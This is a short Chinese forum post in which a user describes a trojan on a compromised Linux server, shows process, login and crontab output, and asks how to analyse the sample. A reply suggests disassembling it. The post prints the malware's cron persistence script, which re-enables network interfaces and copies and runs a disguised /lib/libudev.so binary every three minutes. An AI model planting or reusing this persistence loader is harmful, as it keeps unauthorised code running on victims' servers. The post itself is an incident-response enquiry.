木马样本一枚,求分析方法?

RiboseYim 发布于 2016/06/17 11:50
阅读 366
收藏 0
PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 3494 root      19   0  378m  25m  212 R 1595.6  0.7   5798:34 eyshcjdmzg

-bash-4.3# last -10
user   pts/3        11X.25.49.200    Mon Jun  6 23:46 - 01:47  (02:01)

入侵路径:某普通宽带用户

-bash-4.3# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
*/3 * * * * root /etc/cron.hourly/gcc.sh

-bash-4.3# vi /etc/cron.hourly/gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done   #主动打开网络
cp /lib/libudev.so /lib/libudev.so.6

/lib/libudev.so.6

找了一些工具,简单试了试,大概只能看到函数名,没经验,无法获取更深入的信息。

看样子应该是有一定流行度的木马,应该已经有人分析过,是否存在类似开源样本库的东西,可以让普通人看到源码?


加载中
0
不日小鸡
看源码?自己反汇编
返回顶部
顶部